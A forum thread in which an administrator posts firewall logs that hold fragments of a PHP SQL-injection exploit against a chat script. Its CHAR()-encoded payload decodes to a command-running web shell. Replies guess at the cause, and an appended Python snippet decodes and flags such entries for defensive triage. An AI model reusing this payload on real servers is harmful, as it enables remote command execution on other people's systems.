
help reading SQL Injection log

FreshPrince

Diamond Member
http://192.168.0.2:80/<?/chat/messagesL.php3
http://192.168.0.2:80/die;/chat/messagesL.php3
http://192.168.0.2:80/}/chat/messagesL.php3
http://192.168.0.2:80/chat/messagesL.php3
http://192.168.0.2:80/error_reporting(0);/chat/messagesL.php3
http://192.168.0.2:80/ini_set('max_execution_time',0);/chat/messagesL.php3
http://192.168.0.2:80/ini_set('default_socket_timeout',5);/chat/messagesL.php3
http://192.168.0.2:80/chat/messagesL.php3
http://192.168.0.2:80/{/chat/messagesL.php3
http://192.168.0.2:80/$result='';$exa='';$cont=0;/chat/messagesL.php3
http://192.168.0.2:80/{/chat/messagesL.php3
http://192.168.0.2:80/else/chat/messagesL.php3
http://192.168.0.2:80/else/chat/messagesL.php3
http://192.168.0.2:80/}/chat/messagesL.php3
http://192.168.0.2:80/{/chat/messagesL.php3
http://192.168.0.2:80/$ock=fsockopen(gethostbyname($host),$port);/chat/messagesL.php3
http://192.168.0.2:80/}/chat/messagesL.php3
http://192.168.0.2:80/}/chat/messagesL.php3
http://192.168.0.2:80/}/chat/messagesL.php3
http://192.168.0.2:80/$parts=explode(':',$proxy);/chat/messagesL.php3
http://192.168.0.2:80/$ock=fsockopen($parts[0],$parts[1]);/chat/messagesL.php3
http://192.168.0.2:80/}/chat/messagesL.php3
http://192.168.0.2:80/}/chat/messagesL.php3
http://192.168.0.2:80/fputs($ock,$packet);/chat/messagesL.php3
http://192.168.0.2:80/$html='';/chat/messagesL.php3
http://192.168.0.2:80/$html.=fgets($ock);/chat/messagesL.php3
http://192.168.0.2:80/}/chat/messagesL.php3
http://192.168.0.2:80/}/chat/messagesL.php3
http://192.168.0.2:80/$html='';/chat/messagesL.php3
http://192.168.0.2:80/$html.=fread($ock,1);/chat/messagesL.php3
http://192.168.0.2:80/}/chat/messagesL.php3
http://192.168.0.2:80/}/chat/messagesL.php3
http://192.168.0.2:80/fclose($ock);/chat/messagesL.php3
http://192.168.0.2:80/#debug/chat/messagesL.php3
http://192.168.0.2:80/}/chat/messagesL.php3
http://192.168.0.2:80/{/chat/messagesL.php3
http://192.168.0.2:80/}/chat/messagesL.php3
http://192.168.0.2:80/chat/messagesL.php3
http://192.168.0.2:80/chat/messagesL.php3
http://192.168.0.2:80/$host=$argv[1];/chat/messagesL.php3
http://192.168.0.2:80/$path=$argv[2];/chat/messagesL.php3
http://192.168.0.2:80/$action=$argv[3];/chat/messagesL.php3
http://192.168.0.2:80/$cmd='';$port=80;$proxy='';/chat/messagesL.php3
http://192.168.0.2:80/chat/messagesL.php3
http://192.168.0.2:80/$temp=$argv[$i][0].$argv[$i][1];/chat/messagesL.php3
http://192.168.0.2:80/{/chat/messagesL.php3
http://192.168.0.2:80/$port=str_replace('-p','',$argv[$i]);/chat/messagesL.php3
http://192.168.0.2:80/}/chat/messagesL.php3
http://192.168.0.2:80/$proxy=str_replace('-P','',$argv[$i]);/chat/messagesL.php3
http://192.168.0.2:80/}/chat/messagesL.php3
http://192.168.0.2:80/}/chat/messagesL.php3
http://192.168.0.2:80/chat/messagesL.php3
http://192.168.0.2:80/chat/messagesL.php3
http://192.168.0.2:80/chat/messagesL.php3
http://192.168.0.2:80/$L='L=english';/chat/messagesL.php3
http://192.168.0.2:80/$U='';/chat/messagesL.php3
http://192.168.0.2:80/chat/messagesL.php3
http://192.168.0.2:80/$T.='0,';//latin1/chat/messagesL.php3
http://192.168.0.2:80/$T.='9999999999,';//m_time/chat/messagesL.php3
http://192.168.0.2:80/$T.='1,';//address/chat/messagesL.php3
http://192.168.0.2:80/chat/messagesL.php3
http://192.168.0.2:80/$T.='CHAR(115,121,115,116,101,109,40,36,95,71,69,84,91,99,109,100,93,41,59,100,105,101))/*';/chat/messagesL.php3
http://192.168.0.2:80/chat/messagesL.php3
http://192.168.0.2:80/$T='T='.urlencode($T);/chat/messagesL.php3
http://192.168.0.2:80/chat/messagesL.php3
http://192.168.0.2:80/{/chat/messagesL.php3
http://192.168.0.2:80/srand(make_seed());/chat/messagesL.php3
http://192.168.0.2:80/chat/messagesL.php3
http://192.168.0.2:80/sendpacketii($packet);/chat/messagesL.php3
http://192.168.0.2:80/}/chat/messagesL.php3
http://192.168.0.2:80/sleep(2);/chat/messagesL.php3
http://192.168.0.2:80/sendpacketii($packet);/chat/messagesL.php3
http://192.168.0.2:80/?>/chat/messagesL.php3

I found these types of log entries all over my firewall this morning...

I'm concerned that once it hits https, I won't know what's coming in.

I tested a couple of those requests and they all error out. Should I be concerned?

damn IPS vendor said they blocked it after the fact...typical.
 
I found these types of log entries all over my firewall this morning...

Are they really directed at that local address? Because that would mean it's coming from inside your network... unless you're talking about the local logs on the server, and you're running NAT on a border router.

Anyway, looks like a virus or a bot of some kind scanning you, if you're all patched up you shouldn't have any problems.

 
Originally posted by: Atheus
I found these types of log entries all over my firewall this morning...

Are they really directed at that local address? Because that would mean it's coming from inside your network... unless you're talking about the local logs on the server, and you're running NAT on a border router.

Anyway, looks like a virus or a bot of some kind scanning you, if you're all patched up you shouldn't have any problems.

External IPs, I just changed it to internal.
 
There are ways to decrypt https and scan it for stuff like this. MS's ISA Server 2004, on a Windows Server, can do this. You accept encrypted traffic at your external IP, ISA decrypts it and examines it. Then, if you wish, ISA re-encrypts it and delivers it to your web server.
 
Originally posted by: RebateMonger
There are ways to decrypt https and scan it for stuff like this. MS's ISA Server 2004, on a Windows Server, can do this. You accept encrypted traffic at your external IP, ISA decrypts it and examines it. Then, if you wish, ISA re-encrypts it and delivers it to your web server.

thx for the comment, but I already knew that.

any thoughts on the log above?
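
Added example, not part of the original thread: one way to triage log lines like the ones in the first post is to strip the common /chat/messagesL.php3 suffix, decode any SQL CHAR(...) sequence into text, and flag function names of interest. The function names and the SUSPICIOUS list are assumptions made for this sketch; the three sample lines are copied from the log above.

```python
import re

TARGET = "/chat/messagesL.php3"  # suffix shared by every logged request
CHAR_RE = re.compile(r"CHAR\(\s*(\d+(?:\s*,\s*\d+)*)\s*\)", re.I)
# Constructed indicator list (assumption): calls worth a second look.
SUSPICIOUS = ("system(", "fsockopen(", "eval(", "passthru(", "exec(")

# Three lines copied from the log in the first post.
SAMPLE = [
    "http://192.168.0.2:80/chat/messagesL.php3",
    "http://192.168.0.2:80/$ock=fsockopen($parts[0],$parts[1]);/chat/messagesL.php3",
    "http://192.168.0.2:80/$T.='CHAR(115,121,115,116,101,109,40,36,95,71,69,"
    "84,91,99,109,100,93,41,59,100,105,101))/*';/chat/messagesL.php3",
]

def injected_segment(url):
    """Return whatever precedes TARGET in the path, or None if the line does not fit."""
    m = re.match(r"https?://[^/]+(/.*)$", url.strip())
    if not m or not m.group(1).endswith(TARGET):
        return None
    return m.group(1)[: -len(TARGET)].lstrip("/")

def decode_char(text):
    """Replace each CHAR(n,n,...) with the characters it encodes (byte values only)."""
    def repl(m):
        codes = [int(n) for n in m.group(1).split(",")]
        if any(c > 255 for c in codes):
            return m.group(0)  # not a plain byte sequence, leave untouched
        return "".join(map(chr, codes))
    return CHAR_RE.sub(repl, text)

def triage(url):
    """Summarise one log line: raw segment, decoded segment, matched indicators."""
    seg = injected_segment(url)
    if seg is None:
        return {"segment": None, "decoded": None, "flags": []}
    decoded = decode_char(seg)
    flags = [s for s in SUSPICIOUS if s in decoded.lower()]
    return {"segment": seg, "decoded": decoded, "flags": flags}

if __name__ == "__main__":
    for line in SAMPLE:
        print(triage(line))
```

Lines with an empty segment are plain requests for the chat script; the flagged ones are the entries to take to the IPS vendor along with the source addresses and timestamps from the original log.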
 